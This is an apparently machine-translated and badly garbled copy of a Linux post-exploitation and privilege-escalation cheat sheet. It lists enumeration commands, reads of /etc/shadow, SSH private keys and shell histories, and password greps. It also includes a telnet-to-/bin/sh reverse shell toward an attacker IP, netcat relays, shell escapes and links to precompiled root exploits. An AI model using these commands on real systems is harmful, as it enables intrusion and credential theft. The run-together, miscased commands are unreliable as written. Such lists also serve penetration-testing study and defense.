Access to sensitive information methods after the most complete Linux claim in history

Before starting this article, I would like to point out that I am not an expert. As far as I know, there is no "magical" answer in this vast area. Share, share (my starting point). here is a mix of commands to do the same thing, in different places, or just a different vision to see things. I know there's more "stuff" to look for. This is just a basic rough guide. Not every command, do a good job of attention to detail.

Each action in this article is a command that may not be available on your console because it may be a command that is used in other versions of Linux.

Enumerate key points

(Linux) is the right thing to do:

Collection – enumerations, enumerations, and some more enumerations. Process – Sort by data, analyze and prioritize priorities. Search – Know what to search for and where to find the vulnerability code. Adaptive – A custom vulnerability, so it fits. The work of each system is not "fixed" for every vulnerability. Try – Prepare, test and error.

System type

What is the system version?

Cat/etc/issuecat/etc/*-releasecat/etc/lsb-releasecat/etc/redhat-release

What is the kernel version of it?

Cat/proc/version Uname-auname-mrsrpm-q KERNELDMESG | grep Linuxls/boot | grep vmlinuz

What are some of its environment variables?

Cat/etc/profilecat/etc/bashrccat ~/.bash_profilecat ~/.bashrccat ~/.bash_logoutenvset

Do you have a printer?

Lpstat-a

Applications and Services

What services are running? What kind of service has user rights?

PS Auxps-eftopcat/etc/service

Which services have root permissions? In these services you look like those with loopholes and check again!

PS aux | grep Rootps-ef | grep root

What applications are installed? What version are they? What is currently running?

ls-alh/usr/bin/ls-alh/sbin/dpkg-lrpm-qals-alh/var/cache/apt/archivesols-alh/var/cache/yum/

Service settings, are there any error configurations? Are there any (fragile) plugins?

cat/etc/syslog.confcat/etc/chttp.confcat/etc/lighttpd.confcat/etc/cups/cupsd.confcat/etc/inetd.confcat/etc/ apache2/apache2.confcat/etc/my.confcat/etc/httpd/conf/httpd.confcat/opt/lampp/etc/httpd.confls-arl/etc/| awk ' $ ~/^.*r.*/

What are the work plans on the host?

crontab-lls-alh/var/spool/cronls-al/etc/| grep cronls-al/etc/cron*cat/etc/cron*cat/etc/at.allowcat/etc/at.denycat/etc/cron.allowcat/etc/cron.denycat/etc/ Crontabcat/etc/anacrontabcat/var/spool/cron/crontabs/root

What are the plain text user names and passwords that may be on the host?

Grep-i user [Filename]grep-i Pass [filename]grep-c 5 "Password" [Filename]find. -name "*.php"-print0 | xargs-0 grep-i-N "var $password" # Joomla

Communications and networking

NIC (s), what is the system? Which network is it connected to?

/sbin/ifconfig-acat/etc/network/interfacescat/etc/sysconfig/network

What are the network configuration settings? What kind of server is there in the network? DHCP server? DNS server? Gateway?

Cat/etc/resolv.confcat/etc/sysconfig/networkcat/etc/networksiptables-lhostnamednsdomainname

Other user hosts communicating with the system?

Lsof-ilsof-i: 80grep 80/etc/servicesnetstat-antupnetstat-antpxnetstat-tulpnchkconfig--listchkconfig--list | grep 3:ONLASTW

Cache? IP and/or MAC address?

Arp-eroute/sbin/route-nee

Can packets be sniffed? What do you see? Monitor traffic

# tcpdump TCP DST [IP] [port] and TCP DST [IP] [port]tcpdump TCP DST 192.168.1.7 and TCP DST 10.2.2.222 21

How do you get a shell? How do you interact with the system?

# HTTP://LANMASTER53.COM/2011/05/7-LINUX-SHELLS-USING-BUILT-IN-TOOLS/NC-LVP 4444 # attacker. Enter (command) NC-LVP 4445 # Attacker. Output (Result) telnet [atackers IP] 44444 | /bin/sh | [Local IP] 44445 # on the target system. Using the attacker's ip!

How to port forwarding? (Port redirection)

# rinetd

# Http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

# Fpipe

# fpipe.exe-l [Local Port]-R [Remote port]-s [local port] [local ip]fpipe.exe-l 80-r 80-s 80 192.168.1.7

#ssh

# SSH-[L/R] [local port]:[remote ip]:[remote Port] [local user]@[local ip]ssh-l 8080:127.0.0.1:80 [email protected] # Local portssh-r 8080:127.0.0.1:80 [email protected] # Remote Port

#mknod

# Mknod Backpipe p; NC-L-P [remote port] < Backpipe | NC [local IP] [local port] >backpipemknod backpipe p; Nc-l-P 8080 < Backpipe | NC 10.1.1.251 >backpipe # Port Relaymknod backpipe p; Nc-l-P 8080 0 & < Backpipe | Tee-a Inflow | NC localhost 80 | Tee-a Outflow 1>backpipe # Proxy (Port 8080)

Mknod

Backpipe p; Nc-l-P 8080 0 & < Backpipe | Tee-a Inflow | Nclocalhost 80 | Tee-a Outflow & 1>backpipe # Proxy Monitor (Port 8080)

Is it possible to build tunnels? Local, Remote Send command

ssh-d 127.0.0.1:9050-n [Username]@[ip]proxychains ifconfig

Secret Information and users

Who are you? Which ID is logged in? Who is already logged in? Who else is here? Who can do what?

idwhowlastcat/etc/passwd | cut-d: # List of Usersgrep-v-E "^#"/etc/passwd | Awk-f: & #039; $ = = 0 {print $} ' # List of Super Usersawk-f: ' ($ = = "0") {print}& #039; /ETC/PASSWD # List of Super Userscat/etc/sudoerssudo-l

What sensitive files can I find?

cat/etc/passwdcat/etc/groupcat/etc/shadowls-alh/var/mail/

What interesting files are in Home/directorie (S)? If you have permission to access

ls-ahlr/root/ls-ahlr/home/

Are there any passwords, scripts, databases, configuration files or log files? Password default path and location

Cat/var/apache2/config.inccat/var/lib/mysql/mysql/user. Mydcat/root/anaconda-ks.cfg

What have users done? Do you have any passwords? Did they edit anything?

Cat ~/.bash_historycat ~/.nano_historycat ~/.atftp_historycat ~/.mysql_historycat ~/.php_history

What kind of user information can be found

Cat ~/.bashrccat ~/.profilecat/var/mail/rootcat/var/spool/mail/root

Can private-key information be found?

Cat ~/.ssh/authorized_keyscat ~/.ssh/identity.pubcat ~/.ssh/identitycat ~/.ssh/id_rsa.pubcat ~/.ssh/id_rsacat ~/.ssh /id_dsa.pubcat ~/.ssh/id_dsacat/etc/ssh/ssh_configcat/etc/ssh/sshd_configcat/etc/ssh/ssh_host_dsa_key.pubcat/ Etc/ssh/ssh_host_dsa_keycat/etc/ssh/ssh_host_rsa_key.pubcat/etc/ssh/ssh_host_rsa_keycat/etc/ssh/ssh_host_ Key.pubcat/etc/ssh/ssh_host_key

File system

Which users can write configuration files in/etc/? Ability to reconfigure services?

ls-arl/etc/| awk ' $ ~/^.*w.*/' 2>/dev/null # anyonels-arl/etc/| awk ' $ ~/^. w/' 2>/dev/null # ownerls-arl/etc/| awk ' $ ~/^.....w/' 2>/dev/null # groupls-arl/etc/| awk '; $ ~/w.$/' 2>/dev/null # otherfind/etc/-readable-type F 2>/dev/null # any onefind/etc/-readable-type f-maxdepth 1 2>/dev/null # anyone

In/var/what can be found?

Ls-alh/var/logls-alh/var/maills-alh/var/spoolls-alh/var/spool/lpdls-alh/var/lib/pgsqlls-alh/var/lib/mysqlcat/ Var/lib/dhcp3/dhclient.leases

Any hidden configuration/files on the site? Configuration files and database information?

LS-ALHR/VAR/WWW/LS-ALHR/SRV/WWW/HTDOCS/LS-ALHR/USR/LOCAL/WWW/APACHE22/DATA/LS-ALHR/OPT/LAMPP/HTDOCS/LS-ALHR/ var/www/html/

What is in the log file? (what can help to "local file contains"?)

# http://www.thegeekstuff.com/2011/08/linux-var-log-files/cat /etc/httpd/logs/access_logcat / Etc/httpd/logs/access.logcat /etc/httpd/logs/error_logcat /etc/httpd/logs/error.logcat /var/log /apache2/access_logcat /var/log/apache2/access.logcat /var/log/apache2/error_logcat /var/log/ apache2/error.logcat /var/log/apache/access_logcat /var/log/apache/access.logcat /var/log/ Auth.logcat /var/log/chttp.logcat /var/log/cups/error_logcat /var/log/dpkg.logcat /var/log /faillogcat /var/log/httpd/access_logcat /var/log/httpd/access.logcat /var/log/httpd/error_ logcat /var/log/httpd/error.logcat /var/log/lastlogcat /var/log/lighttpd/access.logcat / var/log/lighttpd/error.logcat /var/log/lighttpd/lighttpd.access.logcat /var/log/lighttpd/ lighttpd.error.logcat /var/log/messagescat /var/log/securecat /var/log/syslogcat /var/log/ Wtmpcat /var/log/xferlogcat&nbsP;/var/log/yum.logcat /var/run/utmpcat /var/webmin/miniserv.logcat /var/www/logs/access_logcat  /var/www/logs/access.logls -alh /var/lib/dhcp3/ls -alh /var/log/postgresql/ls - alh /var/log/proftpd/ls -alh /var/log/samba/#

Auth.log, boot, btmp, Daemon.log, Debug, DMESG, Kern.log, Mail.info,

Mail.log, Mail.warn, messages, Syslog, Udev, wtmp (what's the file? Log. system boot ...)

If the command is limited, what can you do to break its limits?

Python-c ' Import pty;pty.spawn ("/bin/bash") ' Echo os.system ('/bin/bash ')/bin/sh-i

How do I install the file system?

Mountdf-h

Is there a mounted file system?

Cat/etc/fstab

What is advanced Linux file permissions to use? Sticky bits, SUID, and GUIDs

Find / -perm -1000 -type d 2>/dev/null    # sticky  bit - only the owner of the directory or the owner  of a file can delete or rename herefind / -perm -g=s  -type f 2>/dev/null    # SGID  (chmod 2000)  -  run as the  group, not the user who started it.find /  -perm -u=s -type f 2>/dev/null    # SUID  (chmod  4000)  - run as the  owner, not the user who  Started it.find / -perm -g=s -o -perm -u=s -type f 2>/dev /null    # sgid or suidfor i in  ' locate -r  "bin$" ; do find  $i   ( -perm -4000 -o -perm -2000 )  -type f 2>/dev/null;  done     #Looks  in & #039;common& #039;  places: /bin, /sbin,  /usr/bin, /usr/sbin,/usr/local/bin, /usr/local/sbin and any other *bin,  for sgid or suid (Quicker search) #findstarting  at root  (/),  sgidorsuid, not symbolic links, only 3folders deep, list with  more detail and hideany errors  (e.g. permissiondenied) find/-perm -g= s-o-perm -4000! -type l-maxdepth 3 -exec ls -ld {} ;2>/dev/ Null

In which directories can the

be written and executed? Several "common" directories:/tmp directory,/var/tmp directory/dev/shm directory

find / -writable -type d 2>/dev/null         # world-writeable foldersfind / -perm -222 -type d 2>/dev/ Null      # world-writeable foldersfind / -perm -o+w  -type d 2>/dev/null    # world-writeable foldersfind /  -perm -o+x -type d 2>/dev/null    # world-executable  foldersfind /  ( -perm -o+w -perm -o+x )  -type d 2>/ dev/null   # world-writeable & executable foldersany  "Problem"  files? Writable, "not used" file find / -xdev -type d  ( -perm -0002 -a ! -perm  -1000 )  -print   # world-writeable filesfind /dir -xdev   ( -NOUSER&NBsp;-o -nogroup )  -print   # noowner files 

Prepare and find exploit code

What development tools/languages/support are installed?

Find/-name Perl*find/-name python*find/-name gcc*find/-name cc

How do I upload a file?

Find/-name Wgetfind/-name nc*find/-name netcat*find/-name tftp*find/-name FTP

Find exploit code

Http://www.exploit-db.com

Http://1337day.com

Http://www.securiteam.com

Http://www.securityfocus.com

Http://www.exploitsearch.net

http://metasploit.com/modules/

Http://securityreason.com

Http://seclists.org/fulldisclosure/

http://www.google.com

Find more information about the vulnerability

Http://www.cvedetails.com

HTTP://PACKETSTORMSECURITY.ORG/FILES/CVE/[CVE]

HTTP://CVE.MITRE.ORG/CGI-BIN/CVENAME.CGI?NAME=[CVE]]HTTP://CVE.MITRE.ORG/CGI-BIN/CVENAME.CGI?NAME=[CVE]

HTTP://WWW.VULNVIEW.COM/CVE-DETAILS.PHP?CVENAME=[CVE]]HTTP://WWW.VULNVIEW.COM/CVE-DETAILS.PHP?CVENAME=[CVE]

http://www.91ri.org/

(FAST) "common" exploit, precompiled binary code files

http://tarantula.by.ru/localroot/

http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

Is the information above difficult?

Go ahead and use a third-party script/tool to try it out!

How does the system hit the latest patches for the kernel, operating system, all applications, plugins and Web services?

Apt-get update && apt-get upgradeyum update

What are the minimum permissions required for the service to run?

For example, do you need to run MySQL as root?

Can I find a script that runs automatically from the following Web site?!

http://pentestmonkey.net/tools/unix-privesc-check/

http://labs.portcullis.co.uk/application/enum4linux/

Http://bastille-linux.sourceforge.net

(quick) Guide and links

For example

Http://www.0daysecurity.com/penetration-testing/enumeration.html

Http://www.microloft.co.uk/hacking/hacking3.htm

Other

Http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf

Http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf

Http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html

Access to sensitive information methods after the most complete Linux claim in history